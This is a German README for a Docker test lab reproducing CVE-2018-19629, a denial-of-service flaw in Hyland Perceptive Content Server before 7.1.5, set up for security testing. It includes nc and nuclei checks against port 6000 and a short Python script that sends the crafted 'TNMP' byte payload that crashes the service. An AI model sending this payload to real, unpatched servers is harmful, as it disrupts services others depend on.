
Hyland Perceptive Content Server - Dienstverweigerung
Docker-Testumgebung für CVE-2018-19629 - Hyland Perceptive Content Server Denial of Service.
| Feld | Wert |
|---|---|
| CVE-ID | CVE-2018-19629 |
| Schweregrad | Hoch (DoS) |
| Betroffene Versionen | Hyland Perceptive Content Server < 7.1.5 |
| Gepatchte Version | 7.1.5 |
Hyland Perceptive Content Server vor Version 7.1.5 enthält eine Denial-of-Service-Sicherheitslücke, die durch einen Absturz des ImageNow Server-Dienstes über eine TCP-Verbindung verursacht wird. Angreifer können den Dienst stören, indem sie speziell präparierte TCP-Pakete mit der TNMP-Header-Sequenz senden.
# Start the vulnerable environment
docker-compose up -d
# Verify it's listening
# (You might need netcat or similar)
nc -zv localhost 6000
# Test with nuclei template
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000
Sie können den Absturz manuell mit Python auslösen:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()
Überprüfen Sie die Logs, um den Absturz zu sehen:
docker logs -f imagenow-vuln
Sie sollten Folgendes sehen: [!] CRITICAL: Recevied malicious 'TNMP' packet... gefolgt von einem Neustart des Containers.
docker-compose down